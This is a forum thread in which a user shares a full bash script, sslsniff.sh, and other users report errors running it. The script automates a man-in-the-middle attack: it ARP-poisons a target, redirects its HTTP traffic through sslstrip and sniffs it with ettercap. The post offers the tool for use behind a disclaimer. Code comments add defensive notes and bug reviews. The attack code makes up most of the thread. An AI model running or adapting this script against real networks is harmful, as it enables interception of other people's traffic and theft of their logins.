
Thread: sslsniff.sh

  1. #1
    Just burned his ISO thims's Avatar

    Default sslsniff.sh

    @admins: if you feel this is a duplicate post, let me know and delete it, and I will move back to where this originated; but given the revisions, etc., I didn't want to hijack the original post.

    This script is not intended for illegitimate uses, I am in no way responsible for the way you use this, or the decisions you make.

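    This is a script I wrote for SSL sniffing. It chains arpspoof, sslstrip and ettercap, and it only redirects traffic that starts as plain HTTP on port 80.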
    ToDO:
    - ensure ip_forward is always set

    General Usage:
    ./sslsniff.sh -v <ip of target> -g <ip of gateway>
    -v and -g are the only required flags, the rest are optional.
    if -s is not specified sslstrip defaults to port 10000
    -h for help

    Download: mediafire.com/?nmtz2tjvuyj
    Code:
    Code:
    #!/bin/bash
    #
    # Synopsis:	A program to sniff traffic in an SSL connection
    # Author:		thims (thims DOT local AT gmail DOT com)
    # Version:	0.3
    # Date:			20091107
    # Comments:	
    #		ToDO:
    
    
    # Defaults; the option parser at the bottom of the file overrides them.
    # victim and gateway start empty, and initialize() refuses to run while
    # either one is still empty.
    victim=
    gateway=
    # Local port used by both the iptables REDIRECT rule and sslstrip.
    sslPort=10000
    # Config file whose "redir ... iptables" lines are edited in place by
    # capture() and cleanUp().
    etterConf=/etc/etter.conf
    
    # Print the usage text to stdout. Does not exit by itself; every caller
    # follows it with die.
    # NOTE(review): the text advertises "--gateway" while the option parser
    # matches "--gw", and the "-i." entry is written with a period where the
    # other entries use a comma.
    function help() {
    cat << EOF
    Usage: $0 [args] host
        -h, --help     -  Print this help and exit
        -i. --iface    -  Interface to use
        -e, --etconf   -  Location of etter.conf on the filesystem
        -v, --victim   -  IP address of desired host
        -g, --gateway  -  IP address of network gateway
        -s, --sslport  -  Desired port for sslstrip
    EOF
    }
    
    # Print the optional message in $1 to stdout, then exit the script.
    # Arguments: $1 - message (skipped when empty or missing)
    # Exit code: always 1
    function die() {
    	[ -z "$1" ] || echo "$1"
    	exit 1
    }
    
    # Start the command string in $1 in the background under nohup with its
    # output discarded, wait 5 seconds, then look for a matching process.
    # Arguments: $1 - full command line passed as a single string
    # Globals:   cmd, pid (both assigned without "local")
    # Returns:   0 if a PID was found, 1 otherwise
    # NOTE(review): the lookup is by process name only, so an unrelated
    # process with the same name that was already running also yields 0.
    function noHup() {
    	cmd="$1"
    	# $cmd is unquoted here, so the string is word-split into the command
    	# name and its arguments.
    	nohup $cmd > /dev/null &> /dev/null &
    	sleep 5
    	# sslstrip runs under the python interpreter, so pidof on the name
    	# "sslstrip" does not find it; search the ps listing instead.
    	if [ $(echo "$cmd" | awk -F" " '{print $1}') == "sslstrip" ] ;then
    		pid=$(ps ax | grep python | grep sslstrip | awk -F " " '{print $1}')
    	else
    		pid=$(pidof $(echo "$1" | awk -F" " '{print $1}'))
    	fi
    
    	# An empty pid means no matching process was found after the wait.
    	if [ -z "$pid" ] ;then
    		return 1
    	else
    		return 0
    	fi
    }
    
    # Launch arpspoof through noHup with $victim as the -t target and $gateway
    # as the host argument, then record its PID for cleanUp.
    # Globals: iface, victim, gateway (read)
    # Exits through die when noHup reports that no arpspoof process was found.
    # Defender view: while this runs, the target's ARP cache entry for the
    # gateway IP points at the sender's MAC. ARP-table monitoring, static
    # gateway entries and switch-side dynamic ARP inspection are the usual
    # controls against it.
    function spoofMac() {
    	echo -n "Poisoning the victim...."
    	noHup "arpspoof "$iface" -t "$victim" "$gateway""
    	if [ $? -gt 0 ] ;then
    		die "Error: could not initiate arpspoof. Dieing..."
    	fi
    	# PID file under /var/run; cleanUp reads it and then removes it.
    	echo $(pidof arpspoof) > /var/run/sslsniff.arpspoof.run
    	echo "Ok"
    }
    
    # Turn on IPv4 forwarding, add a nat PREROUTING rule that redirects TCP
    # destination port 80 to $sslPort, start sslstrip listening on that port
    # (-l), and record its PID for cleanUp.
    # Only traffic addressed to port 80 is redirected; connections that start
    # on 443 are not matched by this rule. Clients that never send the initial
    # plain-HTTP request (HSTS, preloaded HTTPS-only hosts) are therefore
    # outside what this setup can see.
    # NOTE(review): the previous ip_forward value is not saved before it is
    # overwritten.
    function sslInit() {
    	echo -n "Setting up SSL intercept...."
    	echo 1 > /proc/sys/net/ipv4/ip_forward
    	# Re-write the flag until it no longer reads 0; the loop has no sleep
    	# and no retry limit.
    	while [ $(cat /proc/sys/net/ipv4/ip_forward) == 0 ]
    	do
    		echo 1 > /proc/sys/net/ipv4/ip_forward
    	done
    
    	iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports "$sslPort"
    	noHup "sslstrip -a -f -k -l "$sslPort""
    	if [ $? -gt 0 ] ;then
    		die "Error: could not initiate sslstrip. Dieing..."
    	fi
    	# PID file under /var/run; cleanUp reads it and then removes it.
    	echo $(ps ax | grep python | grep sslstrip | awk -F " " '{print $1}') > /var/run/sslsniff.sslstrip.run
    	echo "Ok"
    }
    
    # Uncomment the matching lines in $etterConf, then run ettercap in the
    # foreground (-T -q). The function returns only when ettercap exits.
    # Globals: etterConf, iface (read)
    # NOTE(review): sed -i edits the config file in place and no backup copy
    # is made.
    function capture() {
    	# Select lines that contain "redir" (case-insensitive) and "iptables",
    	# then delete the first '#' on each of those lines.
    	for linNum in $(cat "$etterConf" | grep -in redir | grep iptables | awk -F: '{print $1}')
    	do
    		sed -i $linNum's/#//' "$etterConf"
    	done
    
    	echo -n "Starting to sniff...."
    	ettercap -T -q "$iface"
    }
    
    # Undo the changes made by the earlier stages: stop sslstrip and arpspoof
    # using their PID files, delete the iptables redirect rule, turn IPv4
    # forwarding off, and re-comment the etter.conf lines.
    # Globals: sslPort, etterConf (read)
    # NOTE(review): no trap is installed anywhere in this listing, so this
    # function runs only when capture returns normally. After an interrupted
    # run the PID files in /var/run, the nat PREROUTING redirect rule,
    # ip_forward=1 and the edited etter.conf all remain on the host, which
    # makes them useful artifacts when examining a machine where it was used.
    function cleanUp() {
    	echo "Cleaning up...."
    	echo -n "Closing SSL proxy...."
    	kill $(cat /var/run/sslsniff.sslstrip.run)
    	rm /var/run/sslsniff.sslstrip.run
    	echo "Ok"
    	echo -n "Unpoisoning the victim...."
    	# Signal number 2 (SIGINT on Linux) is sent instead of the default TERM.
    	kill  -n 2 $(cat /var/run/sslsniff.arpspoof.run)
    	rm /var/run/sslsniff.arpspoof.run
    	echo "Ok"
    	echo -n "Removing iptables rule and ip_forwarding...."
    	iptables -t nat -D PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports "$sslPort"	
    	# Writes 0 unconditionally; a host that had forwarding enabled before
    	# the script ran is left with it disabled.
    	echo 0 > /proc/sys/net/ipv4/ip_forward
    	echo "Ok"
    	
    	# Prefix '#' to every line that matches "redir" and "iptables".
    	# NOTE(review): this is not an exact inverse of capture's edit. Lines
    	# that were already uncommented before the run get commented out, and
    	# lines that stayed commented gain an extra '#'.
    	echo -n "Returning etter.conf to the configuration we found it with...."
    	for linNum in $(cat "$etterConf" | grep -in redir | grep iptables | awk -F: '{print $1}')
    	do
    		sed -i $linNum's/^/#/' "$etterConf"
    	done
    	echo "Ok"
    	echo "Have a nice day!"
    }
    
    # Entry-point logic: refuse to run unless both victim and gateway are set,
    # otherwise print the settings and run the four stages in order.
    # Globals: victim, gateway, iface, sslPort (read)
    # The "Ok!"/"OK!" suffixes are fixed text; no value is checked here beyond
    # the non-empty test on victim and gateway.
    function initialize() {
      if [ -z "$victim" ] || [ -z "$gateway" ] ;then
        help
        echo
        die "Error: a syntactical one"
    	else
    		echo "Enviroment details:"
    		echo "    Victim:         " "$victim" "  Ok!"
    		echo "    Gateway/Router: " "$gateway" "  OK!"
    		echo "    Interface:      " "$iface" "  OK!"
    		echo "    SSLStrip port:  "	"$sslPort" "  OK!"
    
        # Stages run sequentially; cleanUp is reached only after capture returns.
        spoofMac
        sslInit
        capture
    		cleanUp
      fi  
    }
    
    
    # Command-line parsing. Each option reads its value from $2, but the loop
    # shifts only once per pass, so the value comes round again as $1 on the
    # next pass; a value that does not start with '-' matches no case arm and
    # is skipped.
    # NOTE(review): victim, gateway and sslPort are stored as given, with no
    # format or range validation, and are later placed into command strings
    # and an iptables rule.
    while [ $# -gt 0 ]
    do
    	case "$1" in
    		"-h"|"--help")
    			help
    			die
    		;;
    		"-v"|"--victim")
    			victim="$2"
    		;;
    		# The long form accepted here is --gw; the help text says --gateway.
    		"-g"|"--gw")
    			gateway="$2"
    		;;
    		"-s"|"--sslport")
    			sslPort="$2"
    		;;
    		"-i"|"--iface")
    			# Rejected only when ifconfig exits with status 1 exactly.
    			if [ $(ifconfig "$2" &> /dev/null; echo $?) == 1 ] ;then
    				die "Error: interface "$2" does not exist!"
    			else
    				# Stored together with its flag as one string: "-i <name>".
    				iface="-i $2"
    			fi
    		;;
    		"-e"|"--etconf")
    			if [ ! -e "$2" ] ;then
    				die "Error: specified ettercap conf does not exist!"
    			else
    				etterConf="$2"
    			fi
    		;;
    		# An empty argument or any unrecognised dash option prints the usage
    		# text and exits.
    		'')
    			help
    			echo
    			die "Error: a syntactical one"
    		;;
    		-*)
    			help
    			echo
    			die "Error: a syntactical one"
    		;;
    	esac
    	shift
    done
    
    
    # Entry point: a single call, not a loop.
    initialize
    All suggestions, comments, feedback, etc. are more than welcome; I would love to hear what your thoughts are.

    Also I take suggestions/requests for scripts.

  2. #2

    I get the error: Incorrect number of token (//) in TARGET !!

  3. #3
    OlympusII
    Guest

    Default sslsniff

    Stove, use /IP Address/ /Gateway/ and it should work, and then it may quit where mine has.
    I get the following when executing the script:
    bt ~ # sslsniff.sh -v /192.168.1.70/ -g /192.168.1.254/
    Enviroment details:
    Victim: /192.168.1.70/ Ok!
    Gateway/Router: /192.168.1.254/ OK!
    Interface: OK!
    SSLStrip port: 10000 OK!
    Poisoning the victim....Error: could not initiate arpspoof. Dieing...

    I noticed in the script it has /var/run/sslsniff.arpspoof.run. I tried pointing it to /usr/local/sbin/sslsniff.arpspoof.run. No joy there so I removed sslsniff so that it was arpspoof.run, still no joy.
